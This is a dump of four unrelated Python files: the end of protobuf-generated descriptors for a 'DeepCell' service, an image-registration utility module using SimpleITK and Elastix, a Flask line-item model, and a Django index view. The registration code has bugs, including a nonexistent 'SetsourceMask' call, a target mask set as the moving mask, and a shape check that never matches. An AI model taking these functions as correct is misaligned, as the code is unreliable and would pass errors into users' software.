name='x', full_name='Coordinate.x', index=0,
number=1, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='y', full_name='Coordinate.y', index=1,
number=2, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=327,
serialized_end=361,
)
_EDGE = _descriptor.Descriptor(
name='Edge',
full_name='Edge',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='Edge.source', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='target', full_name='Edge.target', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='importance', full_name='Edge.importance', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='Edge.type', index=3,
number=4, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature1', full_name='Edge.feature1', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature2', full_name='Edge.feature2', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='feature3', full_name='Edge.feature3', index=6,
number=7, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=363,
serialized_end=489,
)
_REPLY.fields_by_name['nodes'].message_type = _NODE
_REPLY.fields_by_name['edges'].message_type = _EDGE
_NODE.fields_by_name['coordinate'].message_type = _COORDINATE
DESCRIPTOR.message_types_by_name['Request'] = _REQUEST
DESCRIPTOR.message_types_by_name['Reply'] = _REPLY
DESCRIPTOR.message_types_by_name['Node'] = _NODE
DESCRIPTOR.message_types_by_name['Coordinate'] = _COORDINATE
DESCRIPTOR.message_types_by_name['Edge'] = _EDGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Request = _reflection.GeneratedProtocolMessageType('Request', (_message.Message,), dict(
DESCRIPTOR = _REQUEST,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Request)
))
_sym_db.RegisterMessage(Request)
Reply = _reflection.GeneratedProtocolMessageType('Reply', (_message.Message,), dict(
DESCRIPTOR = _REPLY,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Reply)
))
_sym_db.RegisterMessage(Reply)
Node = _reflection.GeneratedProtocolMessageType('Node', (_message.Message,), dict(
DESCRIPTOR = _NODE,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Node)
))
_sym_db.RegisterMessage(Node)
Coordinate = _reflection.GeneratedProtocolMessageType('Coordinate', (_message.Message,), dict(
DESCRIPTOR = _COORDINATE,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Coordinate)
))
_sym_db.RegisterMessage(Coordinate)
Edge = _reflection.GeneratedProtocolMessageType('Edge', (_message.Message,), dict(
DESCRIPTOR = _EDGE,
__module__ = 'dc_pb2'
# @@protoc_insertion_point(class_scope:Edge)
))
_sym_db.RegisterMessage(Edge)
_DEEPCELL = _descriptor.ServiceDescriptor(
name='DeepCell',
full_name='DeepCell',
file=DESCRIPTOR,
index=0,
options=None,
serialized_start=491,
serialized_end=528,
methods=[
_descriptor.MethodDescriptor(
name='Run',
full_name='DeepCell.Run',
index=0,
containing_service=None,
input_type=_REQUEST,
output_type=_REPLY,
options=None,
),
])
_sym_db.RegisterServiceDescriptor(_DEEPCELL)
DESCRIPTOR.services_by_name['DeepCell'] = _DEEPCELL
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
"""
@author: pattenh1
"""
import numpy as np
import cv2
import os
import SimpleITK as sitk
#import pandas as pd
import time
import datetime
import xml.etree.ElementTree as ET
import xml.dom.minidom
import pkg_resources
class RegImage(object):
'''
Container class for image meta data and processing between ITK and cv2
'''
def __init__(self, filepath, im_format, img_res=1, load_image=True):
'''
Container class for image meta data and processing between ITK and cv2
:param filepath: filepath to the image
:type filepath: str
:param im_format: 'sitk' - SimpleITK format or 'np' - numpy (cv2)
:type im_format: str
:param im_res: pixel spacing of image
:type im_res: float
'''
self.type = 'Registration Image Container'
self.filepath = filepath
self.im_format = im_format
self.spacing = float(img_res)
if load_image == True:
try:
image = sitk.ReadImage(self.filepath)
self.image_xy_dim = image.GetSize()[0:2]
except:
print('Error: image type not recognized')
return
self.image = self.set_img_type(image, self.im_format)
def get_image_from_memory(self, image):
if isinstance(image, sitk.Image):
self.image = image
self.image_xy_dim = self.image.GetSize()[0:2]
self.image = self.set_img_type(self.image, 'sitk')
else:
print('use SimpleITK images to load from memory')
def set_img_type(self, image, im_format):
"""Short summary.
Parameters
----------
image : numpy array or SimpleITK.Image()
Loaded image for registration
im_format : str
'sitk' or 'np' for SimpleITK or Numpy as type.
Returns
-------
self.image or self.mask
image or mask for registration in desired format in memory
"""
if im_format == 'np':
image = sitk.GetArrayFromImage(image)
return image
if im_format == 'sitk':
if len(image.GetSpacing()) == 3:
image.SetSpacing((self.spacing, self.spacing, float(1)))
else:
image.SetSpacing((self.spacing, self.spacing))
return image
def load_mask(self, filepath, im_format):
"""
Loads binary mask for registration.
Parameters
----------
filepath : str
filepath to 8-bit mask with one ROI
im_format : str
'sitk' or 'np' for SimpleITK or Numpy as type.
Returns
-------
self.mask
mask for registration in desired format in memory
"""
self.mask_filepath = filepath
self.mask_im_format = im_format
try:
image = sitk.ReadImage(self.mask_filepath)
self.mask_xy_dim = image.GetSize()[0:2]
self.mask = self.set_img_type(image, self.mask_im_format)
except:
print('Error: image type not recognized')
def get_mask_bounding_box(self):
"""Calculates bounding box of the mask and returns a python dictionary
with the minimum x and y point as well as box width and height for
later slicing.
Returns
-------
dict
returns mask bounding box as dict
"""
try:
self.mask
if self.mask_xy_dim == self.image_xy_dim:
x, y, w, h = self.calculate_bounding_box()
self.mask_bounding_box = {}
self.mask_bounding_box.update({
'min_x': x,
'min_y': y,
'bb_width': w,
'bb_height': h,
})
else:
print('Error: Mask and image dimensions do not match')
except AttributeError:
print('Error: no mask has been loaded')
def crop_to_bounding_box(self):
try:
self.mask_bounding_box
self.image = self.image[
self.mask_bounding_box['min_x']:self.mask_bounding_box['min_x']
+ self.mask_bounding_box['bb_width'], self.mask_bounding_box[
'min_y']:self.mask_bounding_box['min_y'] +
self.mask_bounding_box['bb_height']]
self.mask = self.mask[
self.mask_bounding_box['min_x']:self.mask_bounding_box['min_x']
+ self.mask_bounding_box['bb_width'], self.mask_bounding_box[
'min_y']:self.mask_bounding_box['min_y'] +
self.mask_bounding_box['bb_height']]
self.image.SetOrigin((0, 0))
self.mask.SetOrigin((0, 0))
self.type = self.type + '-Bounding Box Cropped'
except AttributeError:
print('Error: no bounding box extents found')
def calculate_bounding_box(self):
'''
Uses sitk to get bounding box, assumes image is an uint8 mask with only 1 polygonal label.
Returns top-left x,y pixel coordinates and the width and height of bounding box.
'''
#in case the image is np array
if isinstance(self.mask, sitk.Image) == False:
mask = sitk.GetImageFromArray(self.mask)
else:
mask = self.mask
cc = sitk.ConnectedComponent(mask)
lab_stats = sitk.LabelStatisticsImageFilter()
lab_stats.Execute(cc, cc)
bb = lab_stats.GetBoundingBox(1)
x, y, w, h = bb[0], bb[2], bb[1] - bb[0], bb[3] - bb[2]
print('bounding box:', x, y, w, h)
return x, y, w, h
def to_greyscale(self):
'''
Converts RGB registration image to greyscale using cv2. (sitk images will eventually be converted using ITK...)
'''
if self.im_format == 'sitk':
if self.image.GetNumberOfComponentsPerPixel() == 3:
spacing = self.image.GetSpacing()
image = sitk.GetArrayFromImage(self.image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image = sitk.GetImageFromArray(image)
image.SetSpacing(spacing)
elif self.image.GetNumberOfComponentsPerPixel() > 1:
raise ValueError('Channel depth != 3, image is not RGB type')
elif self.image.GetNumberOfComponentsPerPixel() == 1:
image = self.image
if self.im_format == 'np':
if self.image.shape == 3 and self.image.shape[2] == 3:
image = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)
else:
raise ValueError('Channel depth != 3, image is not RGB type')
self.image = image
self.type = self.type + '-Greyscaled'
def compress_AF_channels(self, compression):
'''
This converts multi 2D layer images like multichannel fluorescence images to a single layer by summing, taking the mean or max of the layer.
The final image will be rescaled to unsigned 8-bit.
:param compression: 'sum', 'mean', or 'max'.
'''
if self.im_format == 'sitk':
if self.image.GetDepth() > 1:
image = sitk.GetArrayFromImage(self.image)
if compression == 'sum':
image = np.sum(image, 0)
#print(image.dtype)
#image = cast_8bit_np(image)
if compression == 'mean':
image = np.mean(image, 0)
#print(image.dtype)
if compression == 'max':
image = np.max(image, 0)
#print(image.dtype)
#image = cast_8bit_np(image)
self.image = sitk.GetImageFromArray(image)
self.image = sitk.RescaleIntensity(self.image, 0, 255)
self.image = sitk.Cast(self.image, sitk.sitkUInt8)
#self.image.SetSpacing(self.spacing)
self.image.SetSpacing((self.spacing, self.spacing))
self.type = self.type + '-AF channels compressed'
else:
raise ValueError('Only one layer, image is not multichannel')
if self.im_format == 'np':
if len(self.image.shape) == 3 and self.image.shape[0] > 1:
image = self.image
if compression == 'sum':
image = image.sum(axis=0)
if compression == 'mean':
image = image.mean(axis=0)
if compression == 'max':
image = image.max(axis=0)
#image = cast_8bit_np(image)
self.image = image
self.type = self.type + '-AF channels compressed'
else:
raise ValueError('Only one layer, image is not multichannel')
def invert_intensity(self):
'''
This will invert the intensity scale of a greyscale registration image.
This is useful with histological images where the background is 'whitish.'
'''
if self.im_format == 'sitk':
#use sitk filters instead of CV2 conversion
image = sitk.InvertIntensity(self.image)
#img_bu = self.image
#image = sitk.GetArrayFromImage(self.image)
#image = cv2.bitwise_not(image)
#image = sitk.GetImageFromArray(image)
# image.CopyInformation(img_bu)
if self.im_format == 'np':
image = cv2.bitwise_not(self.image)
self.image = image
self.type = self.type + '-image intensity inverted'
def flip_type(self):
'''
This is a convenience function that flips an image between cv2 and SimpleITK formats.
'''
if self.im_format == 'sitk':
self.image = sitk.GetArrayFromImage(self.image)
self.im_format = 'np'
else:
self.image = sitk.GetImageFromArray(self.image)
self.im_format = 'sitk'
self.image.SetSpacing((self.spacing, self.spacing))
class parameter_files(object):
'''
Class to load SimpleITK parameters from file
'''
def __init__(self):
resource_package = 'regToolboxMSRC'
self.testing = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'testing.txt'))))
self.rigid = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'rigid.txt'))))
self.scaled_rigid = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'scaled_rigid.txt'))))
self.affine = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'affine.txt'))))
self.nl = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'nl.txt'))))
self.correction = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'fi_correction.txt'))))
self.affine_test = sitk.ReadParameterFile(
pkg_resources.resource_filename(resource_package, '/'.join(
('parameter_files', 'affine_test.txt'))))
def get_mask_bb(mask_fp):
'''
Uses sitk to get bounding box after reading image from file, assumes image is an uint8 mask.
Returns top-left x,y pixel coordinates and the width and height of bounding box.
:param mask_fp: File path to the mask image
'''
mask = sitk.ReadImage(mask_fp)
mask = sitk.ConnectedComponent(mask)
lab_stats = sitk.LabelStatisticsImageFilter()
lab_stats.Execute(mask, mask)
bb = lab_stats.GetBoundingBox(1)
x, y, w, h = bb[0], bb[2], bb[1] - bb[0], bb[3] - bb[2]
print('bounding box:', x, y, w, h)
return x, y, w, h
def register_elx_(source,
target,
param,
source_mask=None,
target_mask=None,
output_dir="transformations",
output_fn="myreg.txt",
return_image=False,
logging=True):
'''
Utility function to register 2D images and save their results in a user named subfolder and transformation text file.
:param source: SimpleITK image set as source image. Can optionally pass sitk.ReadImage(source_img_fp) to load image from file. Warning that usually this function is accompanied using the 'RegImage' class where image spacing is set
:param target: SimpleITK image set as target image. Can optionally pass sitk.ReadImage(target_img_fp) to load image from file. Warning that usually this function is accompanied using the 'RegImage' class where image spacing is set
:param param: Elastix paramter file loaded into SWIG. Can optionally pass sitk.ReadParameterFile(parameter_fp) to load text parameter from file. See http://elastix.isi.uu.nl/ for example parameter files
:param source_mask: Filepath to source image (a binary mask) or the source image itself. Function will type check the image.
:param target_mask:
Filepath to target mask image (a binary mask) or the SimpleITK target mask image itself.
Function will type check the image.
:param source_mask:
Filepath to target mask image (a binary mask) or the SimpleITK target mask image itself.
Function will type check the image.
:param output_dir:
String used to create a folder in the current working directory to store registration outputs (iteration information and transformation parameter file)
:param output_fn:
String used to name transformation file in the output_fn directory
:param logging:
Boolean, whether SimpleElastix should log to console. Note that this logging doesn't work in IPython notebooks
:param bounding_box:
Currently experimental that addresses masking in SimpleElastix by cropping images to the bounding box of their mask
:return: Transformation file and optionally the registered source image
:return type: SimpleITK parameter map and SimpleITK image
'''
try:
selx = sitk.SimpleElastix()
except:
selx = sitk.ElastixImageFilter()
if logging == True:
selx.LogToConsoleOn()
param_selx = param
#turns off returning the image in the paramter file
if return_image == False:
param_selx['WriteResultImage'] = ('false', )
selx.SetParameterMap(param_selx)
#set masks if used
if source_mask == None:
pass
else:
if isinstance(source_mask, sitk.Image) == True:
selx.SetMovingMask(source_mask)
else:
source_mask = sitk.ReadImage(source_mask)
source_mask.SetSpacing(source.GetSpacing())
selx.SetsourceMask(source_mask)
if target_mask == None:
pass
else:
if isinstance(target_mask, sitk.Image) == True:
selx.SetTargetMask(target_mask)
else:
target_mask = sitk.ReadImage(target_mask)
target_mask.SetSpacing(target.GetSpacing())
selx.SetsourceMask(target_mask)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
selx.SetOutputDirectory(os.path.join(os.getcwd(), output_dir))
selx.SetMovingImage(source)
selx.SetFixedImage(target)
selx.LogToFileOn()
#execute registration:
if return_image == True:
transformed_image = selx.Execute()
else:
selx.Execute()
os.rename(
os.path.join(os.getcwd(), output_dir, 'TransformParameters.0.txt'),
os.path.join(os.getcwd(), output_dir, output_fn))
transformationMap = selx.GetTransformParameterMap()
if return_image == True:
return transformationMap, transformed_image
else:
return transformationMap
def register_elx_n(source,
target,
param,
output_dir="transformations",
output_fn="myreg.txt",
return_image=False,
intermediate_transform=False,
logging=True):
'''
Utility function to register 2D images and save their results in a user named subfolder and transformation text file.
:param source: SimpleITK image set as source image. Can optionally pass sitk.ReadImage(source_img_fp) to load image from file. Warning that usually this function is accompanied using the 'RegImage' class where image spacing is set
:param target: SimpleITK image set as target image. Can optionally pass sitk.ReadImage(target_img_fp) to load image from file. Warning that usually this function is accompanied using the 'RegImage' class where image spacing is set
:param param: Elastix paramter file loaded into SWIG. Can optionally pass sitk.ReadParameterFile(parameter_fp) to load text parameter from file. See http://elastix.isi.uu.nl/ for example parameter files
:param source_mask: Filepath to source image (a binary mask) or the source image itself. Function will type check the image.
:param target_mask:
Filepath to target mask image (a binary mask) or the SimpleITK target mask image itself.
Function will type check the image.
:param source_mask:
Filepath to target mask image (a binary mask) or the SimpleITK target mask image itself.
Function will type check the image.
:param output_dir:
String used to create a folder in the current working directory to store registration outputs (iteration information and transformation parameter file)
:param output_fn:
String used to name transformation file in the output_fn directory
:param logging:
Boolean, whether SimpleElastix should log to console. Note that this logging doesn't work in IPython notebooks
:param bounding_box:
Currently experimental that addresses masking in SimpleElastix by cropping images to the bounding box of their mask
:return: Transformation file and optionally the registered source image
:return type: SimpleITK parameter map and SimpleITK image
'''
try:
selx = sitk.SimpleElastix()
except:
selx = sitk.ElastixImageFilter()
#gotta fix this element
if str(type(source)) != str(
'<class \'regToolboxMSRC.utils.reg_utils.RegImage\'>'):
print('Error: source is not of an object of type RegImage')
return
if str(type(target)) != str(
'<class \'regToolboxMSRC.utils.reg_utils.RegImage\'>'):
print('Error: source is not of an object of type RegImage')
return
if logging == True:
selx.LogToConsoleOn()
param_selx = param
#turns off returning the image in the paramter file
if return_image == False:
param_selx['WriteResultImage'] = ('false', )
selx.SetParameterMap(param_selx)
#set masks if used
try:
source.mask
if isinstance(source.mask, sitk.Image) == True:
selx.SetMovingMask(source.mask)
else:
print('Error: Source mask could not be set')
except AttributeError:
print('No moving mask found')
try:
target.mask
if isinstance(target.mask, sitk.Image) == True:
selx.SetFixedMask(target.mask)
else:
print('Error: Target mask could not be set')
except AttributeError:
print('No fixed mask found')
if not os.path.exists(output_dir):
os.makedirs(output_dir)
selx.SetOutputDirectory(os.path.join(os.getcwd(), output_dir))
selx.SetMovingImage(source.image)
selx.SetFixedImage(target.image)
selx.LogToFileOn()
#execute registration:
if return_image == True:
transformed_image = selx.Execute()
else:
selx.Execute()
#os.rename(
# os.path.join(os.getcwd(), output_dir, 'TransformParameters.0.txt'),
# os.path.join(os.getcwd(), output_dir, output_fn + '.txt'))
transformationMap = selx.GetTransformParameterMap()[0]
transformationMap['OriginalSizeMoving'] = [
str(source.image_xy_dim[0]),
str(source.image_xy_dim[1])
]
transformationMap['OriginalSizeFixed'] = [
str(target.image_xy_dim[0]),
str(target.image_xy_dim[1])
]
transformationMap['BoundingBoxMoving'] = ['0', '0', '0', '0']
transformationMap['BoundingBoxFixed'] = ['0', '0', '0', '0']
if hasattr(source, 'mask_bounding_box'):
transformationMap['BoundingBoxMoving'] = [
str(source.mask_bounding_box['min_x']),
str(source.mask_bounding_box['min_y']),
str(source.mask_bounding_box['bb_width']),
str(source.mask_bounding_box['bb_height'])
]
if hasattr(target, 'mask_bounding_box'):
transformationMap['BoundingBoxFixed'] = [
str(target.mask_bounding_box['min_x']),
str(target.mask_bounding_box['min_y']),
str(target.mask_bounding_box['bb_width']),
str(target.mask_bounding_box['bb_height'])
]
if intermediate_transform == True:
transformationMap['IntermediateTransform'] = ['true']
else:
transformationMap['IntermediateTransform'] = ['false']
sitk.WriteParameterFile(transformationMap,
os.path.join(os.getcwd(), output_dir,
output_fn + '.txt'))
if return_image == True:
return transformationMap, transformed_image
else:
return transformationMap
def paste_to_original_dim(transformed_image, target_x, target_y,
final_size_2D):
'''
Experimental support function to used 'crops' of singular masks rather than using Elastix masking (which seems not to work...)
Returns image in coordinate original coordinate space
:param target_x:
top-left x coordinate of mask's bounding box
:param target_y:
top-left y coordinate of mask's bounding box
:param final_size_2D:
m x n dimensions of target image from registration
'''
if transformed_image.GetNumberOfComponentsPerPixel() == 3:
print('RGB_image')
placeholder = sitk.Image([final_size_2D[0], final_size_2D[1]],
transformed_image.GetPixelIDValue(), 3)
placeholder.GetSize()
transformed_image = sitk.Paste(
placeholder,
transformed_image,
transformed_image.GetSize(),
destinationIndex=[target_x, target_y])
elif transformed_image.GetDepth() > 1:
print('multichannel_image')
placeholder = sitk.Image(
[final_size_2D[0], final_size_2D[1],
transformed_image.GetDepth()],
transformed_image.GetPixelIDValue())
#print('image made')
#print(str(placeholder.GetSize()))
#print(str(transformed_image.GetSize()))
transformed_image = sitk.Paste(
placeholder,
transformed_image,
transformed_image.GetSize(),
destinationIndex=[target_x, target_y, 0])
elif transformed_image.GetDepth(
) < 1 and transformed_image.GetNumberOfComponentsPerPixel() == 1:
print('singlechannel_image')
placeholder = sitk.Image([final_size_2D[0], final_size_2D[1]],
transformed_image.GetPixelIDValue())
placeholder.GetSize()
transformed_image = sitk.Paste(
placeholder,
transformed_image,
transformed_image.GetSize(),
destinationIndex=[target_x, target_y])
return transformed_image
def check_im_size_fiji(image):
'''
Checks to see if image size is too large to be loaded into FIJI as a .tiff
:param image:
SimpleITK image
'''
impixels = image.GetSize()[0] * image.GetSize()[1]
if len(image.GetSize()) > 2:
impixels = impixels * image.GetSize()[2]
impixels = impixels * image.GetNumberOfComponentsPerPixel()
return impixels > 10**9
def transform_image(source, transformationMap, override_tform=False):
"""Transforms an image using SimpleTransformix.
Parameters
----------
source : SimpleITK.Image
SimpleITK image that will be registered.
transformationMap : SimpleITK parameterMap
SimpleITK parameterMap that defines transformation
Returns
-------
SimpleITK image
Transformed image
"""
try:
transformix = sitk.SimpleTransformix()
except:
transformix = sitk.TransformixImageFilter()
overriden_flag = False
if 'BoundingBoxMoving' in transformationMap:
bb_source = list(transformationMap['BoundingBoxMoving'])
bb_source = [int(float(x)) for x in bb_source]
if sum(bb_source) > 0:
source = source[bb_source[0]:bb_source[0] + bb_source[2],
bb_source[1]:bb_source[1] + bb_source[3]]
source.SetOrigin([0, 0])
transformix.SetMovingImage(source)
transformix.SetTransformParameterMap(transformationMap)
transformix.LogToConsoleOn()
source_tformed = transformix.Execute()
if source_tformed.GetSize(
) != transformationMap['OriginalSizeFixed'] and override_tform == True:
bb = list(transformationMap['BoundingBoxFixed'])
bb = [int(float(x)) for x in bb]
img_size = list(transformationMap['OriginalSizeFixed'])
img_size = [int(float(x)) for x in img_size]
source_tformed = paste_to_original_dim(source_tformed, bb[0], bb[1],
(img_size[0], img_size[1]))
overriden_flag = True
if source_tformed.GetSize(
) != transformationMap['OriginalSizeFixed'] and transformationMap['IntermediateTransform'] == (
'false', ) and overriden_flag == False:
bb_target = list(transformationMap['BoundingBoxFixed'])
bb_target = [int(float(x)) for x in bb_target]
img_size = list(transformationMap['OriginalSizeFixed'])
img_size = [int(float(x)) for x in img_size]
source_tformed = paste_to_original_dim(source_tformed, bb_target[0],
bb_target[1],
(img_size[0], img_size[1]))
img_spacing = [float(x) for x in transformationMap['Spacing']]
source_tformed.SetSpacing(img_spacing)
return (source_tformed)
def transform_mc_image_sitk(image_fp,
transformationMap,
img_res,
from_file=True,
is_binary_mask=False,
override_tform=False):
if from_file == True:
print('image loaded from file')
image = sitk.ReadImage(image_fp)
if len(image.GetSpacing()) == 3:
image.SetSpacing((float(img_res), float(img_res), float(1)))
else:
image.SetSpacing((float(img_res), float(img_res)))
if from_file == False:
print('image loaded from memory')
image = image_fp
# grayscale image transformation
if image.GetNumberOfComponentsPerPixel() == 1 and image.GetDepth() == 0:
print('transforming grayscale image')
tformed_image = transform_image(
image, transformationMap, override_tform=override_tform)
print('casting grayscale image')
if is_binary_mask == True:
tformed_image = sitk.Cast(tformed_image, sitk.sitkUInt8)
return tformed_image
else:
tformed_image = sitk.RescaleIntensity(tformed_image, 0, 255)
tformed_image = sitk.Cast(tformed_image, sitk.sitkUInt8)
return tformed_image
# RGB image
if image.GetNumberOfComponentsPerPixel() > 1:
tformed_image = []
for chan in range(image.GetNumberOfComponentsPerPixel()):
print('getting image ' + str(chan) + ' of RGB')
channel = sitk.VectorIndexSelectionCast(image, chan)
print('transforming image ' + str(chan) + ' of RGB')
channel = transform_image(
channel, transformationMap, override_tform=override_tform)
print('rescaling image ' + str(chan) + ' of RGB')
channel = sitk.RescaleIntensity(channel, 0, 255)
tformed_image.append(channel)
print('composing RGB')
tformed_image = sitk.Compose(tformed_image)
tformed_image = sitk.Cast(tformed_image, sitk.sitkVectorUInt8)
return tformed_image
#multilayer 2D image, i.e. multichannel fluorescence
if image.GetDepth() > 0:
tformed_image = []
for chan in range(image.GetDepth()):
print('getting image ' + str(chan) + ' of multi-layer image')
channel = image[:, :, chan]
print('transforming image ' + str(chan) + ' of multi-layer image')
channel = transform_image(
channel, transformationMap, override_tform=override_tform)
print('rescaling image ' + str(chan) + ' of multi-layer image')
channel = sitk.RescaleIntensity(channel, 0, 255)
tformed_image.append(channel)
print('adding images to sequence')
tformed_image = sitk.JoinSeries(tformed_image)
print('casting to 8-bit')
tformed_image = sitk.Cast(tformed_image, sitk.sitkUInt8)
return tformed_image
return tformed_image
def transform_from_gui(source_fp, transforms, TFM_wd, src_reso, project_name):
"""Deprecated function for gui transform. This will read a python list of
transforms and apply them in chain.
Parameters
----------
source_fp : str
Filepath string to image to be transformed
transforms : list
Python list of transform filepaths
TFM_wd : str
String of directory where image will be saved
src_reso : float
pixel resolution of image
project_name : str
Name that will be appended onto saved image.
Returns
-------
None
Only writes image
"""
for i in range(len(transforms)):
if i == 0:
source = transform_mc_image_sitk(
source_fp,
transforms[i],
src_reso,
from_file=True,
is_binary_mask=False)
if i > 0:
source = transform_mc_image_sitk(
source,
transforms[i],
source.GetSpacing()[0],
from_file=False,
is_binary_mask=False)
os.chdir(TFM_wd)
sitk.WriteImage(source, project_name + ".tif", True)
def write_param_xml(xml_params, opdir, ts, project_name):
"""Deprecated xml parameter save function. changed to .yaml
"""
stringed = ET.tostring(xml_params)
reparsed = xml.dom.minidom.parseString(stringed)
myfile = open(opdir + ts + project_name + '_parameters.xml', "w")
myfile.write(reparsed.toprettyxml(indent="\t"))
myfile.close()
return
def prepare_output(wd, project_name, xml_params):
"""Deprecaed xml parameter function.
"""
#prepare folder name
ts = datetime.datetime.fromtimestamp(
time.time()).strftime('%Y%m%d_%H_%M_%S_')
os.chdir(wd)
os.makedirs(ts + project_name + "_images")
opdir = ts + project_name + "_images\\"
#output parameters to XML file
#output parameters to XML file
write_param_xml(xml_params, opdir, ts, project_name)
def RegImage_load(image, source_img_res, load_image=True):
if isinstance(image, sitk.Image) == True:
image.SetSpacing((source_img_res, source_img_res))
return image
elif os.path.exists(image):
try:
image = RegImage(image, 'sitk', source_img_res, load_image)
return image
except:
print('invalid image file')
def parameterFile_load(parameterFile):
"""Convenience function to load parameter file. Detects whether parameterFile
is already loaded into memory or needs to be loaded from file.
Parameters
----------
parameterFile : str or SimpleITK parameterMap
filepath to a SimpleITK parameterMap or a SimpleITK parameterMap loaded into memory
Returns
-------
SimpleITK parameterMap
"""
if isinstance(parameterFile, sitk.ParameterMap) == True:
return parameterFile
elif os.path.exists(parameterFile):
try:
parameterFile = sitk.ReadParameterFile(parameterFile)
return parameterFile
except:
print('invalid parameter file')
else:
print('parameter input is not valid')
def reg_image_preprocess(image_fp,
img_res,
img_type='RGB_l',
mask_fp=None,
bounding_box=False):
if img_type in ['RGB_l', 'AF', 'in_memory', 'none']:
if img_type == "RGB_l":
out_image = RegImage(image_fp, 'sitk', img_res)
out_image.to_greyscale()
out_image.invert_intensity()
elif img_type == 'AF':
out_image = RegImage(image_fp, 'sitk', img_res)
if out_image.image.GetDepth() > 1:
out_image.compress_AF_channels('max')
if out_image.image.GetNumberOfComponentsPerPixel() == 3:
out_image.to_greyscale()
elif img_type == 'in_memory':
out_image = RegImage(
'from_file', 'sitk', img_res, load_image=False)
out_image.get_image_from_memory(image_fp)
else:
out_image = RegImage(image_fp, 'sitk', img_res)
if mask_fp != None:
if isinstance(mask_fp, sitk.Image) == True:
if out_image.image.GetSize() != mask_fp.GetSize():
print(
'Warning: reg image and mask do not have the same dimension'
)
out_image.mask = mask_fp
else:
out_image.load_mask(mask_fp, 'sitk')
if bounding_box == True:
out_image.get_mask_bounding_box()
out_image.crop_to_bounding_box()
else:
print(img_type + ' is an invalid image type (valid: RGB_l & AF)')
return out_image
def parameter_load(reg_model):
"""Load a default regtoolboxMSRC registration parameter or one from file.
Parameters
----------
reg_model : str
a string of the default parameterMap name. If reg_model is not in the default list
it should be a filepath to a SimpleITK parameterMap
Returns
-------
SimpleITK parameterMap
"""
if isinstance(reg_model, str):
if reg_model in [
'affine', 'affine_test', 'fi_correction', 'nl', 'rigid',
'scaled_rigid', 'testing'
]:
reg_param = getattr(parameter_files(), reg_model)
return reg_param
else:
try:
reg_param = sitk.ReadParameterFile(reg_model)
return reg_param
except:
print('invalid parameter file')
else:
print(
'parameter input is not a filepath or default parameter file str')
|
from flask import g
class LineItem:
def __init__(self, username, order_id, menu_item_id):
self.username = username
self.order_id = order_id
self.menu_item_id = menu_item_id
@classmethod
def create(cls, username, order_id, menu_item_id):
query = """
INSERT INTO
lineitems
(username, order_id, item_id)
VALUES
(%s, %s, %s);
"""
with g.db.cursor() as cursor:
cursor.execute(query, (username,order_id, menu_item_id))
g.db.commit()
return cls(
username=username,
order_id=order_id,
menu_item_id=menu_item_id
)
@classmethod
def delete(cls, username, order_id, menu_item_id):
query = """
DELETE FROM
lineitems
WHERE username = %s AND order_id = %s and item_id = %s;
"""
with g.db.cursor() as cursor:
cursor.execute(query, (username,order_id, menu_item_id))
g.db.commit()
|
from django.shortcuts import render
from django.views.generic import TemplateView
# Top page
class IndexView(TemplateView):
template_name = "index.html"
def get_context_data(self):
ctxt = super().get_context_data()
ctxt["username"] = "NAME"
return ctxt
